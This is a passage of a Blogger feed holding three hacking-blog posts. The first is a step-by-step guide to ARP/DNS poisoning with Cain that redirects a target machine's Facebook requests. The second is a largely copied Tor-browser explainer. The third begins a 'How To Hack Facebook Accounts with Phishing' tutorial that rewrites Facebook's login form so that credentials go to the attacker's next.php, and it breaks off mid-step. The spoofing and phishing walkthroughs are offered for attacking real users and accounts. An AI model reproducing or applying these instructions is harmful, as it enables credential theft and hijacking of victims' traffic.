/&gt;&lt;br /&gt;First This is the structure of the network :&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://farm5.static.flickr.com/4044/4337060175_5b99b48ac0.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;250&quot; src=&quot;http://farm5.static.flickr.com/4044/4337060175_5b99b48ac0.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;1-&lt;/b&gt;&lt;/span&gt;&amp;nbsp;2 and 3 are computers&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1 is the computer being the gateway (could be a router) (172.128.254.1)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2 is the target computer (172.128.254.10)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3 is the attacker using cain&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Note : IPs are just used for this tutorial and chosen randomly.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Our work is on computer number 3.&lt;br /&gt;&lt;br /&gt;__________________________________________________ &amp;nbsp;______&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1-After you install cain , open it and go to the sniffer tab&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;2-&lt;/b&gt;&lt;/span&gt;Click on configure and choose your adapter&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://farm5.static.flickr.com/4032/4336895163_134d4202fd.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;215&quot; src=&quot;http://farm5.static.flickr.com/4032/4336895163_134d4202fd.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;3-&lt;/b&gt;&lt;/span&gt;Enable the sniffer (click on the second icon in the toolbar next to the open icon)&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;4-&lt;/span&gt;&lt;/b&gt;Right click in the empty area and choose scan MAC addresses. We get the results above.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;5-&lt;/span&gt;&lt;/b&gt;Click on the APR Tab&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://farm3.static.flickr.com/2725/4337645862_9e847b91e4.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;150&quot; src=&quot;http://farm3.static.flickr.com/2725/4337645862_9e847b91e4.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;6-&lt;/span&gt;&lt;/b&gt;Click on the + sign in the toolbar to add a new ARP poison routing&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://farm5.static.flickr.com/4062/4337656172_57b3d5b3b5.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://farm5.static.flickr.com/4062/4337656172_57b3d5b3b5.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b style=&quot;font-size: x-large;&quot;&gt;7-&lt;/b&gt;Choose the gateway which is 172.128.254.1 , in the next list you’ll&amp;nbsp;&lt;/div&gt;&lt;div&gt;get the IP of the computer 2 which is 172.128.254.10 and click ok&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://farm5.static.flickr.com/4009/4337049117_87315e8629.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://farm5.static.flickr.com/4009/4337049117_87315e8629.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;8-&lt;/span&gt;&lt;/b&gt;Now click on the APR-DNS tab&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://farm5.static.flickr.com/4029/4337796362_14af553609.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://farm5.static.flickr.com/4029/4337796362_14af553609.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;9-&lt;/b&gt;&lt;/span&gt;click on the + sign&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;10-&lt;/span&gt;&lt;/b&gt;enter the web address that you want to spoof , (in this case when the&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;user goes to facebook he’ll be redirected to myspace) click on resolve&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;type the web address that you want to redirect the user to it, and click&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;ok, and you’ll get the IP of the web address, then click ok&amp;nbsp;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://farm3.static.flickr.com/2731/4337798910_e83774f149.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://farm3.static.flickr.com/2731/4337798910_e83774f149.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;you&#39;ll get something like this:&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://farm5.static.flickr.com/4003/4337057395_171642d13d.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://farm5.static.flickr.com/4003/4337057395_171642d13d.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;11-&lt;/span&gt;&lt;/b&gt;now to make this work we have to enable APR poisoning , click on the&lt;br /&gt;icon next to the sniffer icon, and everything should work as we expect.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now the computer 2 will get the routes poisoned and when the user requests http://www.facebook.com he will be redirected to http://www.myspace.com .&lt;br /&gt;&lt;br /&gt;Imagine what you can do with this technique.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I hope this was a good tutorial for you guys , and please leave your feedback.&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;&lt;br /&gt;-----------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/7300986446266376229/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-perform-dns-poisoning-attack.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/7300986446266376229'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/7300986446266376229'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-perform-dns-poisoning-attack.html' title='How To Perform DNS Poisoning attack'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-F4nX-WCP0q0/TZS1mK9aPyI/AAAAAAAAAbo/MMelOHDnFgM/s72-c/poison_sign.png" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-84752030794134781</id><published>2012-03-13T23:59:00.000+05:30</published><updated>2012-03-13T23:59:21.555+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="IP Address"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type='text'>Anonymous Web surfing With TOR</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-9GEDgwHRPCc/T1-Qv1EUDNI/AAAAAAAAACA/kWFz_m9Zbxo/s1600/FB0GXGBFEAKB6GP.MEDIUM.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;274&quot; src=&quot;http://3.bp.blogspot.com/-9GEDgwHRPCc/T1-Qv1EUDNI/AAAAAAAAACA/kWFz_m9Zbxo/s320/FB0GXGBFEAKB6GP.MEDIUM.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;We all many times use proxies for staying anonymous on internet. Lets quickly check out , what we are actually doing while using proxies. We first connect to a proxy server which brings resources requested by us from the web server.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-xh4ViwUhz4g/T19iEZrlaXI/AAAAAAAAABw/lTZv0als5oI/s1600/proxy.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;96&quot; src=&quot;http://1.bp.blogspot.com/-xh4ViwUhz4g/T19iEZrlaXI/AAAAAAAAABw/lTZv0als5oI/s320/proxy.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Thus a proxy server hides our identity by acting as an intermediary between us and the web server that we are accessing. Suppose we break into a server using a proxy server thinking that we are anonymous. But what if owner of web server starts enquiring about the clients connecting to it using the proxy server and it is possible that owners of proxy server might reveal our identity. This means we cant actually rely on proxy servers for being anonymous online. Here comes the concept of THE ONION ROUTING (TOR) into picture. By using this , the client traffic is supposed to be passed from three different servers or nodes before reaching to actual web server. It may randomly take any path through any three nodes.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-AhF2_3CkNjA/T19ibeEVc8I/AAAAAAAAAB4/i4Jmeetd4Jo/s1600/tor.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;236&quot; src=&quot;http://4.bp.blogspot.com/-AhF2_3CkNjA/T19ibeEVc8I/AAAAAAAAAB4/i4Jmeetd4Jo/s320/tor.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Lets consider it has taken path shown by green arrows. Now&lt;br /&gt;&lt;br /&gt;* Node 1 knows only actual origin(client) but not actual destinantion(web server).&lt;br /&gt;*Node 5 neither knows actual origin nor actual destinantion.&lt;br /&gt;*Node 9 knows actual destination but not actual origin.&lt;br /&gt;&lt;br /&gt;Thus no one exactly knows which client is accessing which web server. So it is highly anonymous.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;What is Tor?(According to&amp;nbsp;&lt;a href=&quot;http://www.torproject.org/&quot;&gt;www.torproject.org&lt;/a&gt;)&lt;/span&gt;&lt;br /&gt;Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Why Anonymity Matters..??&lt;/span&gt;&lt;br /&gt;Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location. Tor works with many of your existing applications, including web browsers, instant messaging clients, remote login, and other applications based on the TCP protocol.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;TOR Browser&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The Best one I would suggest is to use TOR browser.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The Tor software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets you access sites which are blocked.&lt;br /&gt;&lt;br /&gt;The Tor Browser Bundle lets you use Tor on Windows, Mac OS X, or Linux without needing to install any software. It can run off a USB flash drive, comes with a pre-configured web browser called Aurora, and is self-contained. If you would prefer to use your existing web browser, install Tor permanently, or if you don&#39;t use Windows, see the other ways to &lt;a href=&quot;https://www.torproject.org/download/download.html.en&quot;&gt;download Tor&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Download TOR:-&lt;br /&gt;For &lt;a href=&quot;https://www.torproject.org/dist/torbrowser/tor-browser-2.2.35-7.1_en-US.exe&quot;&gt;Windows&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;For &lt;a href=&quot;https://www.torproject.org/dist/torbrowser/osx/TorBrowser-2.2.35-7.1-dev-osx-x86_64-en-US.zip&quot;&gt;MaC&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;For &lt;a href=&quot;https://www.torproject.org/dist/torbrowser/linux/tor-browser-gnu-linux-i686-2.2.35-7.2-dev-en-US.tar.gz&quot;&gt;Linux&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Installing TOR on Windows&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Download the file above, and save it somewhere, then double click on it. Click on the button labelled &quot;...&quot; (1) and select where you want to save the bundle then click OK (2). At least 50 MB free space must be available in the location you select. If you want to leave the bundle on the computer, saving it to the Desktop is a good choice. If you want to move it to a different computer or limit the traces you leave behind, save it to a USB disk.&lt;br /&gt;&lt;br /&gt;Click Extract (3) to begin extraction. This may take a few minutes to complete.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://www.torproject.org/images/tbb-screenshot1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;288&quot; src=&quot;https://www.torproject.org/images/tbb-screenshot1.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Once extraction is complete, open the folder Tor Browser from the location you saved the bundle.&lt;br /&gt;&lt;br /&gt;Double click on the Start Tor Browser (4) application (it may be called Start Tor Browser.exe on some systems.)&lt;br /&gt;&lt;br /&gt;The Vidalia window will shortly appear.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://www.torproject.org/images/tbb-screenshot2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;288&quot; src=&quot;https://www.torproject.org/images/tbb-screenshot2.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #1a1a1a; font-size: 13px; line-height: 20px; margin-bottom: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Once Tor is ready, Firefox will automatically be opened. Only web pages visited through the included Firefox browser will be sent via Tor. Other web browsers such as Internet Explorer are not affected. Make sure that it says&amp;nbsp;&lt;span style=&quot;border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #00aa00; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;&quot;Tor Enabled&quot;&lt;/span&gt;&amp;nbsp;(5) in the bottom right corner before using it. To reduce the risk of confusion, don&#39;t run Firefox while using the Tor Browser Bundle, and close existing Firefox windows before starting.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #1a1a1a; font-size: 13px; line-height: 20px; margin-bottom: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;If you installed the Tor IM Browser Bundle, the Pidgin instant messaging client will also be automatically opened.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #1a1a1a; font-size: 13px; line-height: 20px; margin-bottom: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Once you are finished browsing, close any open Firefox windows by clicking on the&amp;nbsp;&lt;span style=&quot;border-color: initial; border-image: initial; border-style: initial; font-style: inherit; outline-color: initial; outline-style: initial;&quot;&gt;&lt;img alt=&quot;Close     button (×)&quot; height=&quot;19&quot; src=&quot;https://www.torproject.org/images/tbb-close-button.png&quot; style=&quot;border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; max-width: 710px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot; width=&quot;19&quot; /&gt;&lt;/span&gt;&amp;nbsp;(6). For privacy reasons, the list of webpages you visited and any cookies will be deleted.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://www.torproject.org/images/tbb-screenshot3a.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;288&quot; src=&quot;https://www.torproject.org/images/tbb-screenshot3a.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;With the Tor Browser Bundle, Vidalia and Tor will automatically close.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;Source:&amp;nbsp;&lt;a href=&quot;http://www.torproject.org/&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;www.torproject.org&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/84752030794134781/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/anonymous-web-surfing-with-tor.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/84752030794134781'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/84752030794134781'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/anonymous-web-surfing-with-tor.html' title='Anonymous Web surfing With TOR'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-9GEDgwHRPCc/T1-Qv1EUDNI/AAAAAAAAACA/kWFz_m9Zbxo/s72-c/FB0GXGBFEAKB6GP.MEDIUM.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-1182660017427142232</id><published>2012-03-13T19:00:00.000+05:30</published><updated>2012-03-13T19:00:01.263+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Phishing"/><title type='text'>How To Hack Facebook Accounts with Phishing [Step by Step]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-cD3iNwNnIog/TtWY_mT9GuI/AAAAAAAAANU/eDl9J6Ezjew/s1600/phis.jpg&quot; /&gt;&lt;/div&gt;&lt;br /&gt;Now im gonna make a step by step tutorial for facebook accounts..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ONE!:&lt;br /&gt;&lt;br /&gt;go to &quot;&lt;a href=&quot;http://www.facebook.com/login.php&quot;&gt;www.facebook.com/login.php&lt;/a&gt;&quot; and right click on some white space&lt;br /&gt;on the page and press &quot;view source code&quot;. A LOT of text is gonna appear,&lt;br /&gt;copy it all to notepad.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;TWO!:&lt;br /&gt;&lt;br /&gt;Now we need to change a few things in the code. So that the login button&lt;br /&gt;sends the info to our file instead of the facebook login. We do that by&lt;br /&gt;editing the action of the code. So press Edit &amp;gt;&amp;gt; search. and&lt;br /&gt;search &quot;action=&quot; without the quotes. you should find this&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://img354.imageshack.us/img354/7116/screen1pf8.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;177&quot; src=&quot;http://img354.imageshack.us/img354/7116/screen1pf8.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;The big red ring that circles the &quot;action=&quot; you have to change. You have&amp;nbsp;&lt;/div&gt;&lt;div&gt;to change it to &#39;action=&quot;next.php&quot; &#39;. after you have done that, you&amp;nbsp;&lt;/div&gt;&lt;div&gt;should change the method (small red circle on the picture) to &quot;get&quot;&amp;nbsp;&lt;/div&gt;&lt;div&gt;instead of &quot;post&quot;, or else it will not work. Save the document 